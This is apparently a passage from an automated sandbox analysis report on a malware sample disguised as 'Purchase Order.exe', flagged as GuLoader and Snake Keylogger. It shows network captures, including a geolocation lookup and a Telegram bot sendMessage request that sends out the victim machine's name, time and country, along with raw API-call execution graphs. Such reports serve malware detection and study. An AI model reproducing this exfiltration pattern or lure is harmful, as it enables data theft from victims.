                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1159&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2441821&cwnd=251&unsent_bytes=0&cid=b2ff4b60a6b78396&ts=144&x=0"
                                                                                                2024-10-21 09:30:42 UTC365INData Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a
                                                                                                Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
                                                                                                2024-10-21 09:30:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                3192.168.2.549983188.114.97.34433340C:\Users\user\Desktop\Purchase Order.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-10-21 09:30:46 UTC87OUTGET /xml/155.94.241.186 HTTP/1.1
                                                                                                Host: reallyfreegeoip.org
                                                                                                Connection: Keep-Alive
                                                                                                2024-10-21 09:30:46 UTC898INHTTP/1.1 200 OK
                                                                                                Date: Mon, 21 Oct 2024 09:30:46 GMT
                                                                                                Content-Type: application/xml
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                access-control-allow-origin: *
                                                                                                vary: Accept-Encoding
                                                                                                Cache-Control: max-age=86400
                                                                                                CF-Cache-Status: HIT
                                                                                                Age: 28711
                                                                                                Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=opTVkZCLn5Xt%2BSwnpKIL8RiYLqTpMOFusfVCmVmJDR%2FGfcz2aQC63s4k8T7Pjy36wEVrsuZyivEJYcHDgMl5PzdJDm%2FgHLcnynVVF8fMkep0mISsV248CDe8O9xV1%2FldB%2FoFB08J"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8d603b1b3d0e6c30-DFW
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1258&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2234567&cwnd=248&unsent_bytes=0&cid=502905d619c772ec&ts=144&x=0"
                                                                                                2024-10-21 09:30:46 UTC365INData Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a
                                                                                                Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
                                                                                                2024-10-21 09:30:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                4192.168.2.549985188.114.97.34433340C:\Users\user\Desktop\Purchase Order.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-10-21 09:30:48 UTC63OUTGET /xml/155.94.241.186 HTTP/1.1
                                                                                                Host: reallyfreegeoip.org
                                                                                                2024-10-21 09:30:49 UTC896INHTTP/1.1 200 OK
                                                                                                Date: Mon, 21 Oct 2024 09:30:49 GMT
                                                                                                Content-Type: application/xml
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                access-control-allow-origin: *
                                                                                                vary: Accept-Encoding
                                                                                                Cache-Control: max-age=86400
                                                                                                CF-Cache-Status: HIT
                                                                                                Age: 28714
                                                                                                Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nPPRhjkcl%2BvQlZBkW4dNF3j0kxCG7ZVUiSq5ig11aQaslYW%2BZa3SfjyZiKEHa9q8epr27H6e6mbfCHzrkCymbMWftUb%2FBrpKHpQlIDnH7O0ptsCRFLnTVc%2FPxGsMbgm8K20n5Nml"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8d603b282f376b47-DFW
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1113&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2462585&cwnd=251&unsent_bytes=0&cid=7fded5e6b87ac194&ts=147&x=0"
                                                                                                2024-10-21 09:30:49 UTC365INData Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a
                                                                                                Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
                                                                                                2024-10-21 09:30:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                5192.168.2.549987188.114.97.34433340C:\Users\user\Desktop\Purchase Order.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-10-21 09:30:52 UTC63OUTGET /xml/155.94.241.186 HTTP/1.1
                                                                                                Host: reallyfreegeoip.org
                                                                                                2024-10-21 09:30:52 UTC892INHTTP/1.1 200 OK
                                                                                                Date: Mon, 21 Oct 2024 09:30:52 GMT
                                                                                                Content-Type: application/xml
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                access-control-allow-origin: *
                                                                                                vary: Accept-Encoding
                                                                                                Cache-Control: max-age=86400
                                                                                                CF-Cache-Status: HIT
                                                                                                Age: 28717
                                                                                                Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pHtt1IweCp3UwqLo0C5GJtiCqLsHtnw0dcca11wgg6qaFNyMU5le%2BT30wGGB7cIh7mcf6oQYeKrKA2MqIfYwBEL9fkdpoH9cy%2BHJfH0ehiMUMtETSDGMQn6FfPkr3lYnyflkhc9u"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8d603b3d5b566ba6-DFW
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1739&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1664367&cwnd=251&unsent_bytes=0&cid=ac23ecdfbeaff331&ts=147&x=0"
                                                                                                2024-10-21 09:30:52 UTC365INData Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a
                                                                                                Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
                                                                                                2024-10-21 09:30:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                6192.168.2.549988149.154.167.2204433340C:\Users\user\Desktop\Purchase Order.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-10-21 09:30:53 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2021/10/2024%20/%2017:55:09%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                Host: api.telegram.org
                                                                                                Connection: Keep-Alive
                                                                                                2024-10-21 09:30:53 UTC344INHTTP/1.1 404 Not Found
                                                                                                Server: nginx/1.18.0
                                                                                                Date: Mon, 21 Oct 2024 09:30:53 GMT
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 55
                                                                                                Connection: close
                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                2024-10-21 09:30:53 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                Click to jump to process

                                                                                                Click to jump to process

                                                                                                Click to dive into process behavior distribution

                                                                                                Click to jump to process

                                                                                                Target ID:0
                                                                                                Start time:05:29:07
                                                                                                Start date:21/10/2024
                                                                                                Path:C:\Users\user\Desktop\Purchase Order.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\Purchase Order.exe"
                                                                                                Imagebase:0x400000
                                                                                                File size:1'055'136 bytes
                                                                                                MD5 hash:46AE79C53627F188D4C316ADB7635524
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2755799259.0000000005F62000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:4
                                                                                                Start time:05:30:11
                                                                                                Start date:21/10/2024
                                                                                                Path:C:\Users\user\Desktop\Purchase Order.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\Purchase Order.exe"
                                                                                                Imagebase:0x400000
                                                                                                File size:1'055'136 bytes
                                                                                                MD5 hash:46AE79C53627F188D4C316ADB7635524
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3384062771.000000003692F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3384062771.0000000036831000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:low
                                                                                                Has exited:false

                                                                                                Reset < >

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:23.9%
                                                                                                  Dynamic/Decrypted Code Coverage:13.9%
                                                                                                  Signature Coverage:21.3%
                                                                                                  Total number of Nodes:1520
                                                                                                  Total number of Limit Nodes:53
                                                                                                  execution_graph 5065 10001000 5068 1000101b 5065->5068 5075 100014bb 5068->5075 5070 10001020 5071 10001024 5070->5071 5072 10001027 GlobalAlloc 5070->5072 5073 100014e2 3 API calls 5071->5073 5072->5071 5074 10001019 5073->5074 5077 100014c1 5075->5077 5076 100014c7 5076->5070 5077->5076 5078 100014d3 GlobalFree 5077->5078 5078->5070 3917 402241 3932 402ace 3917->3932 3920 402ace 18 API calls 3921 402250 3920->3921 3922 402ace 18 API calls 3921->3922 3923 402259 3922->3923 3938 4061fb FindFirstFileA 3923->3938 3926 402273 lstrlenA lstrlenA 3929 405110 25 API calls 3926->3929 3927 402266 3941 405110 3927->3941 3930 4022af SHFileOperationA 3929->3930 3930->3927 3931 40226e 3930->3931 3933 402ada 3932->3933 3952 405f19 3933->3952 3936 402247 3936->3920 3939 406211 FindClose 3938->3939 3940 402262 3938->3940 3939->3940 3940->3926 3940->3927 3942 40512b 3941->3942 3951 4051ce 3941->3951 3943 405148 lstrlenA 3942->3943 3944 405f19 18 API calls 3942->3944 3945 405171 3943->3945 3946 405156 lstrlenA 3943->3946 3944->3943 3948 405184 3945->3948 3949 405177 SetWindowTextA 3945->3949 3947 405168 lstrcatA 3946->3947 3946->3951 3947->3945 3950 40518a SendMessageA SendMessageA SendMessageA 3948->3950 3948->3951 3949->3948 3950->3951 3951->3931 3968 405f26 3952->3968 3953 406149 3954 402afb 3953->3954 3986 405ef7 lstrcpynA 3953->3986 3954->3936 3970 406162 3954->3970 3956 405fc7 GetVersion 3956->3968 3957 406120 lstrlenA 3957->3968 3958 405f19 10 API calls 3958->3957 3962 40603f GetSystemDirectoryA 3962->3968 3963 406052 GetWindowsDirectoryA 3963->3968 3964 406162 5 API calls 3964->3968 3965 405f19 10 API calls 3965->3968 3966 4060c9 lstrcatA 3966->3968 3967 406086 SHGetSpecialFolderLocation 3967->3968 3969 40609e SHGetPathFromIDListA CoTaskMemFree 3967->3969 3968->3953 3968->3956 3968->3957 3968->3958 3968->3962 3968->3963 3968->3964 3968->3965 3968->3966 3968->3967 3979 405dde RegOpenKeyExA 3968->3979 3984 405e55 wsprintfA 3968->3984 3985 405ef7 lstrcpynA 3968->3985 3969->3968 3977 40616e 3970->3977 3971 4061da CharPrevA 3975 4061d6 3971->3975 3972 4061cb CharNextA 3972->3975 3972->3977 3973 4061f5 3973->3936 3975->3971 3975->3973 3976 4061b9 CharNextA 3976->3977 3977->3972 3977->3975 3977->3976 3978 4061c6 CharNextA 3977->3978 3987 405994 3977->3987 3978->3972 3980 405e11 RegQueryValueExA 3979->3980 3981 405e4f 3979->3981 3982 405e32 RegCloseKey 3980->3982 3981->3968 3982->3981 3984->3968 3985->3968 3986->3954 3988 40599a 3987->3988 3989 4059ad 3988->3989 3990 4059a0 CharNextA 3988->3990 3989->3977 3990->3988 5079 406542 5083 4063c6 5079->5083 5080 406d31 5081 406450 GlobalAlloc 5081->5080 5081->5083 5082 406447 GlobalFree 5082->5081 5083->5080 5083->5081 5083->5082 5084 4064c7 GlobalAlloc 5083->5084 5085 4064be GlobalFree 5083->5085 5084->5080 5084->5083 5085->5084 5086 4022c3 5087 4022dd 5086->5087 5088 4022ca 5086->5088 5089 405f19 18 API calls 5088->5089 5090 4022d7 5089->5090 5091 4056ed MessageBoxIndirectA 5090->5091 5091->5087 4032 401746 4033 402ace 18 API calls 4032->4033 4034 40174d 4033->4034 4038 405b99 4034->4038 4036 401754 4037 405b99 2 API calls 4036->4037 4037->4036 4039 405ba4 GetTickCount GetTempFileNameA 4038->4039 4040 405bd1 4039->4040 4041 405bd5 4039->4041 4040->4039 4040->4041 4041->4036 5092 4026c7 5093 4026cd 5092->5093 5094 4026d5 FindClose 5093->5094 5095 40295e 5093->5095 5094->5095 5096 401947 5097 402ace 18 API calls 5096->5097 5098 40194e lstrlenA 5097->5098 5099 40258a 5098->5099 5100 402749 5101 402ace 18 API calls 5100->5101 5102 402757 5101->5102 5103 40276d 5102->5103 5104 402ace 18 API calls 5102->5104 5105 405b45 2 API calls 5103->5105 5104->5103 5106 402773 5105->5106 5128 405b6a GetFileAttributesA CreateFileA 5106->5128 5108 402780 5109 402823 5108->5109 5110 40278c GlobalAlloc 5108->5110 5113 40282b DeleteFileA 5109->5113 5114 40283e 5109->5114 5111 4027a5 5110->5111 5112 40281a CloseHandle 5110->5112 5129 403277 SetFilePointer 5111->5129 5112->5109 5113->5114 5116 4027ab 5117 403261 ReadFile 5116->5117 5118 4027b4 GlobalAlloc 5117->5118 5119 4027c4 5118->5119 5120 4027f8 5118->5120 5122 402ff0 45 API calls 5119->5122 5121 405c11 WriteFile 5120->5121 5123 402804 GlobalFree 5121->5123 5127 4027d1 5122->5127 5124 402ff0 45 API calls 5123->5124 5125 402817 5124->5125 5125->5112 5126 4027ef GlobalFree 5126->5120 5127->5126 5128->5108 5129->5116 4145 1000270b 4146 1000275b 4145->4146 4147 1000271b VirtualProtect 4145->4147 4147->4146 4158 4020cd 4159 402ace 18 API calls 4158->4159 4160 4020d4 4159->4160 4161 402ace 18 API calls 4160->4161 4162 4020de 4161->4162 4163 402ace 18 API calls 4162->4163 4164 4020e8 4163->4164 4165 402ace 18 API calls 4164->4165 4166 4020f2 4165->4166 4167 402ace 18 API calls 4166->4167 4168 4020fc 4167->4168 4169 40213b CoCreateInstance 4168->4169 4170 402ace 18 API calls 4168->4170 4173 40215a 4169->4173 4175 402202 4169->4175 4170->4169 4172 402238 4174 4021e2 MultiByteToWideChar 4173->4174 4173->4175 4174->4175 4175->4172 4176 401423 4175->4176 4177 405110 25 API calls 4176->4177 4178 401431 4177->4178 4178->4172 5140 1000180d 5141 10001830 5140->5141 5142 10001860 GlobalFree 5141->5142 5143 10001872 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5141->5143 5142->5143 5144 10001266 2 API calls 5143->5144 5145 100019e3 GlobalFree GlobalFree 5144->5145 4179 40524e 4180 405270 GetDlgItem GetDlgItem GetDlgItem 4179->4180 4181 4053f9 4179->4181 4225 404111 SendMessageA 4180->4225 4183 405401 GetDlgItem CreateThread CloseHandle 4181->4183 4184 405429 4181->4184 4183->4184 4228 4051e2 OleInitialize 4183->4228 4185 405457 4184->4185 4187 405478 4184->4187 4188 40543f ShowWindow ShowWindow 4184->4188 4189 4054b2 4185->4189 4190 40545f 4185->4190 4186 4052e0 4191 4052e7 GetClientRect GetSystemMetrics SendMessageA SendMessageA 4186->4191 4195 404143 8 API calls 4187->4195 4227 404111 SendMessageA 4188->4227 4189->4187 4200 4054bf SendMessageA 4189->4200 4193 405467 4190->4193 4194 40548b ShowWindow 4190->4194 4198 405355 4191->4198 4199 405339 SendMessageA SendMessageA 4191->4199 4201 4040b5 SendMessageA 4193->4201 4196 4054ab 4194->4196 4197 40549d 4194->4197 4202 405484 4195->4202 4204 4040b5 SendMessageA 4196->4204 4203 405110 25 API calls 4197->4203 4205 405368 4198->4205 4206 40535a SendMessageA 4198->4206 4199->4198 4200->4202 4207 4054d8 CreatePopupMenu 4200->4207 4201->4187 4203->4196 4204->4189 4209 4040dc 19 API calls 4205->4209 4206->4205 4208 405f19 18 API calls 4207->4208 4210 4054e8 AppendMenuA 4208->4210 4211 405378 4209->4211 4212 405506 GetWindowRect 4210->4212 4213 405519 TrackPopupMenu 4210->4213 4214 405381 ShowWindow 4211->4214 4215 4053b5 GetDlgItem SendMessageA 4211->4215 4212->4213 4213->4202 4217 405535 4213->4217 4218 4053a4 4214->4218 4219 405397 ShowWindow 4214->4219 4215->4202 4216 4053dc SendMessageA SendMessageA 4215->4216 4216->4202 4220 405554 SendMessageA 4217->4220 4226 404111 SendMessageA 4218->4226 4219->4218 4220->4220 4221 405571 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4220->4221 4223 405593 SendMessageA 4221->4223 4223->4223 4224 4055b5 GlobalUnlock SetClipboardData CloseClipboard 4223->4224 4224->4202 4225->4186 4226->4215 4227->4185 4229 404128 SendMessageA 4228->4229 4230 405205 4229->4230 4233 401389 2 API calls 4230->4233 4234 40522c 4230->4234 4231 404128 SendMessageA 4232 40523e OleUninitialize 4231->4232 4233->4230 4234->4231 4246 4023d3 4247 4023d9 4246->4247 4248 402ace 18 API calls 4247->4248 4249 4023eb 4248->4249 4250 402ace 18 API calls 4249->4250 4251 4023f5 RegCreateKeyExA 4250->4251 4252 402729 4251->4252 4253 40241f 4251->4253 4254 402437 4253->4254 4255 402ace 18 API calls 4253->4255 4256 402443 4254->4256 4258 402aac 18 API calls 4254->4258 4257 402430 lstrlenA 4255->4257 4259 402462 RegSetValueExA 4256->4259 4263 402ff0 4256->4263 4257->4254 4258->4256 4261 402478 RegCloseKey 4259->4261 4261->4252 4264 40301b 4263->4264 4265 402fff SetFilePointer 4263->4265 4278 4030f8 GetTickCount 4264->4278 4265->4264 4268 4030b8 4268->4259 4271 4030f8 43 API calls 4272 403052 4271->4272 4272->4268 4273 4030be ReadFile 4272->4273 4275 403061 4272->4275 4273->4268 4275->4268 4276 405be2 ReadFile 4275->4276 4277 405c11 WriteFile 4275->4277 4276->4275 4277->4275 4279 403250 4278->4279 4280 403126 4278->4280 4281 402cab 33 API calls 4279->4281 4293 403277 SetFilePointer 4280->4293 4288 403022 4281->4288 4283 403131 SetFilePointer 4287 403156 4283->4287 4287->4288 4289 405c11 WriteFile 4287->4289 4290 403231 SetFilePointer 4287->4290 4294 403261 4287->4294 4297 406393 4287->4297 4304 402cab 4287->4304 4288->4268 4291 405be2 ReadFile 4288->4291 4289->4287 4290->4279 4292 40303b 4291->4292 4292->4268 4292->4271 4293->4283 4295 405be2 ReadFile 4294->4295 4296 403274 4295->4296 4296->4287 4298 4063b8 4297->4298 4301 4063c0 4297->4301 4298->4287 4299 406450 GlobalAlloc 4299->4298 4299->4301 4300 406447 GlobalFree 4300->4299 4301->4298 4301->4299 4301->4300 4301->4301 4302 4064c7 GlobalAlloc 4301->4302 4303 4064be GlobalFree 4301->4303 4302->4298 4302->4301 4303->4302 4305 402cd1 4304->4305 4306 402cb9 4304->4306 4307 402ce1 GetTickCount 4305->4307 4308 402cd9 4305->4308 4309 402cc2 DestroyWindow 4306->4309 4310 402cc9 4306->4310 4307->4310 4312 402cef 4307->4312 4319 4062cc 4308->4319 4309->4310 4310->4287 4313 402d24 CreateDialogParamA ShowWindow 4312->4313 4314 402cf7 4312->4314 4313->4310 4314->4310 4323 402c8f 4314->4323 4316 402d05 wsprintfA 4317 405110 25 API calls 4316->4317 4318 402d22 4317->4318 4318->4310 4320 4062e9 PeekMessageA 4319->4320 4321 4062f9 4320->4321 4322 4062df DispatchMessageA 4320->4322 4321->4310 4322->4320 4324 402ca0 MulDiv 4323->4324 4325 402c9e 4323->4325 4324->4316 4325->4324 5146 4044d3 5147 4044e3 5146->5147 5148 404509 5146->5148 5149 4040dc 19 API calls 5147->5149 5150 404143 8 API calls 5148->5150 5151 4044f0 SetDlgItemTextA 5149->5151 5152 404515 5150->5152 5151->5148 5153 401cd4 5154 402aac 18 API calls 5153->5154 5155 401cda IsWindow 5154->5155 5156 401a0e 5155->5156 4326 4014d6 4327 402aac 18 API calls 4326->4327 4328 4014dc Sleep 4327->4328 4330 40295e 4328->4330 4331 4025d7 4332 402aac 18 API calls 4331->4332 4334 4025e1 4332->4334 4333 40264f 4334->4333 4335 405be2 ReadFile 4334->4335 4336 402651 4334->4336 4339 402661 4334->4339 4335->4334 4340 405e55 wsprintfA 4336->4340 4338 402677 SetFilePointer 4338->4333 4339->4333 4339->4338 4340->4333 4341 401759 4342 402ace 18 API calls 4341->4342 4343 401760 4342->4343 4344 401786 4343->4344 4345 40177e 4343->4345 4381 405ef7 lstrcpynA 4344->4381 4380 405ef7 lstrcpynA 4345->4380 4348 401784 4352 406162 5 API calls 4348->4352 4349 401791 4382 405969 lstrlenA CharPrevA 4349->4382 4376 4017a3 4352->4376 4353 4061fb 2 API calls 4353->4376 4356 4017ba CompareFileTime 4356->4376 4357 40187e 4358 405110 25 API calls 4357->4358 4360 401888 4358->4360 4359 401855 4361 405110 25 API calls 4359->4361 4378 40186a 4359->4378 4362 402ff0 45 API calls 4360->4362 4361->4378 4363 40189b 4362->4363 4365 4018af SetFileTime 4363->4365 4367 4018c1 CloseHandle 4363->4367 4364 405ef7 lstrcpynA 4364->4376 4365->4367 4366 405f19 18 API calls 4366->4376 4368 4018d2 4367->4368 4367->4378 4369 4018d7 4368->4369 4370 4018ea 4368->4370 4371 405f19 18 API calls 4369->4371 4372 405f19 18 API calls 4370->4372 4374 4018df lstrcatA 4371->4374 4375 4018f2 4372->4375 4374->4375 4377 4056ed MessageBoxIndirectA 4375->4377 4376->4353 4376->4356 4376->4357 4376->4359 4376->4364 4376->4366 4379 405b6a GetFileAttributesA CreateFileA 4376->4379 4385 405b45 GetFileAttributesA 4376->4385 4388 4056ed 4376->4388 4377->4378 4379->4376 4380->4348 4381->4349 4383 405983 lstrcatA 4382->4383 4384 401797 lstrcatA 4382->4384 4383->4384 4384->4348 4386 405b64 4385->4386 4387 405b57 SetFileAttributesA 4385->4387 4386->4376 4387->4386 4389 405702 4388->4389 4390 40574e 4389->4390 4391 405716 MessageBoxIndirectA 4389->4391 4390->4376 4391->4390 4392 401e59 4393 402ace 18 API calls 4392->4393 4394 401e5f 4393->4394 4395 402ace 18 API calls 4394->4395 4396 401e68 4395->4396 4397 402ace 18 API calls 4396->4397 4398 401e71 4397->4398 4399 402ace 18 API calls 4398->4399 4400 401e7a 4399->4400 4401 401423 25 API calls 4400->4401 4402 401e81 ShellExecuteA 4401->4402 4403 401eae 4402->4403 5157 401659 5158 402ace 18 API calls 5157->5158 5159 40165f 5158->5159 5160 4061fb 2 API calls 5159->5160 5161 401665 5160->5161 5162 401959 5163 402aac 18 API calls 5162->5163 5164 401960 5163->5164 5165 402aac 18 API calls 5164->5165 5166 40196d 5165->5166 5167 402ace 18 API calls 5166->5167 5168 401984 lstrlenA 5167->5168 5169 401994 5168->5169 5170 4019d4 5169->5170 5174 405ef7 